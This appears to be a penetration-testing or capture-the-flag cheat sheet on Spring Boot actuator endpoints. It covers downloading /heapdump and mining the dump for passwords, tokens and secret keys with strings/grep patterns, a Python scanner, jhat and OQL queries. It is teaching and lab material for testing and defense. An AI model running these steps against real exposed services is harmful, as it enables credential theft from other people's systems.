Java - Spring Boot

Starting

```bash
# Common Spring Boot Endpoints
# (Spring Boot 1.x paths; Spring Boot 2.x and later serve them under /actuator/, e.g. /actuator/heapdump)

## well-known
/metrics    # Shows metrics information for the current application
/heapdump   # Returns a JVM heap dump (may contain PASSWORD | ACCESS_KEY | ACCESS_TOKEN ...)
/dump       # Displays a dump of threads
/env        # Exposes properties from Spring's ConfigurableEnvironment

/autoconfig # Displays an auto-configuration report
/shutdown   # Shuts the application down (not enabled by default)
/pause      # Allows the application to be gracefully paused (not enabled by default)
/mappings   # Displays a collated list of all @RequestMapping paths
/trace      # Displays the last several HTTP messages

## Fuzzing - Seclists
/seclists/Discovery/Web-Content/Programming-Language-Specific/Java-Spring-Boot.txt
```

The goal is to reach the /heapdump endpoint, because the JVM heap is the memory area where sensitive data is kept at runtime, such as:

  • PASSWORD, SECRET_KEYS, ACCESS_TOKEN, etc.

Command for extracting the heapdump from its archive

```bash
# Extracting the heapdump
tar -xvzf heapdump.tar.gz # Output : heapdump.hprof
```

Use commands like strings and grep to search for keywords related to sensitive data:

```bash
## Searching for sensitive strings
strings heapdump.hprof | grep -i -C 2 "password"
# -e b scans for 16-bit big-endian characters, the layout of Java String char[] contents
strings -e b heapdump.hprof | grep -in "password"
strings -e b heapdump.hprof | grep -in -E "flag|password|token|secret|key"
strings -e b heapdump.hprof | grep -Ei '^(JWT|TOKEN|API[_-]?KEY|SECRET|PASSWORD|PASS|DB[_-]?PASSWORD|SESSION[_-]?KEY)[ =:]'
```
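The same search as a small Python scanner, added here as an example that is not part of the original page: it scans a dump for printable runs in both encodings that Java strings use (Latin-1 compact strings on JDK 9+, UTF-16BE char[] contents on JDK 8, which is what the -e b flag above is for) and reports KEY=value / KEY: value pairs, so you can check what a dump of your own application leaks before /heapdump is ever reachable. SAMPLE_HEAP is a constructed byte string standing in for a real .hprof file.

```python
import re

# Key names from the grep pattern above. Unlike that pattern, '=' or ':' must
# follow the key, so prose that merely mentions "password" is not reported.
KEY_NAMES = r"(?:JWT|TOKEN|API[_-]?KEY|SECRET|PASSWORD|PASS|DB[_-]?PASSWORD|SESSION[_-]?KEY)"
SECRET_RE = re.compile(rf"\b({KEY_NAMES})\s*[=:]\s*(\S+)", re.IGNORECASE)

# Printable runs as `strings` (ASCII / Latin-1 compact strings, JDK 9+) and
# `strings -e b` (UTF-16BE char[] contents, JDK 8 and earlier) would see them.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")
UTF16BE_RUN = re.compile(rb"(?:\x00[\x20-\x7e]){6,}")


def candidate_strings(blob: bytes):
    """Yield (encoding, offset, text) for every printable run in either encoding."""
    for m in ASCII_RUN.finditer(blob):
        yield "ascii", m.start(), m.group().decode("latin-1")
    for m in UTF16BE_RUN.finditer(blob):
        yield "utf-16be", m.start(), m.group().decode("utf-16-be")


def find_secrets(blob: bytes):
    """Return [(encoding, offset, key, value)] for secret-looking assignments."""
    hits = []
    for enc, off, text in candidate_strings(blob):
        for m in SECRET_RE.finditer(text):
            hits.append((enc, off, m.group(1), m.group(2)))
    return hits


# Constructed stand-in for a heap dump: a few bytes of header/record noise
# around strings stored in both encodings (not a real .hprof file).
SAMPLE_HEAP = (
    b"JAVA PROFILE 1.0.2\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x00\x02"
    + b"spring.datasource.password=s3cr3t!"            # Latin-1 compact string
    + b"\x0c\x00\x00\x00"
    + "JWT: eyJ.PLACEHOLDER.sig".encode("utf-16-be")   # UTF-16BE char[] content
    + b"\x00\x00\x03"
    + b"Enter your password"                            # prose, no '=' or ':'
    + "org/springframework/boot/actuate".encode("utf-16-be")
)

if __name__ == "__main__":
    for enc, off, key, value in find_secrets(SAMPLE_HEAP):
        print(f"{enc:9s} @0x{off:06x}  {key} = {value}")
```

To run it against a real dump, read the .hprof file into bytes and pass it to find_secrets().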

Using jhat for heapdump analysis

```bash
# Download OpenJDK 8 (the last JDK that ships jhat; it was removed in JDK 9)
wget https://github.com/adoptium/temurin8-binaries/releases/download/jdk8u392-b08/OpenJDK8U-jdk_x64_linux_hotspot_8u392b08.tar.gz
tar -xvzf OpenJDK8U-jdk_x64_linux_hotspot_8u392b08.tar.gz
cd jdk8u392-b08/bin

# Check that it is correctly installed
./jhat -version
```

```bash
# Start jhat with the heapdump file (listens on port 7000 by default)
./jhat heapdump.hprof

# Or give the JVM more heap (4 GB) and use a custom port
./jhat -port 7401 -J-Xmx4G ~/heapdump_rootme.hprof

# Then go to: http://localhost:7401/oql/ to perform OQL queries
```

Object Query Language (OQL) example

```sql
-- Example of a query in Object Query Language
select s from java.lang.String s where s.toString().toLowerCase().contains("flag")

-- Query for strings containing any of these sensitive terms
select s from java.lang.String s where s.toString().toLowerCase().matches(".*(password|token|key|flag|secret).*")
```

Resources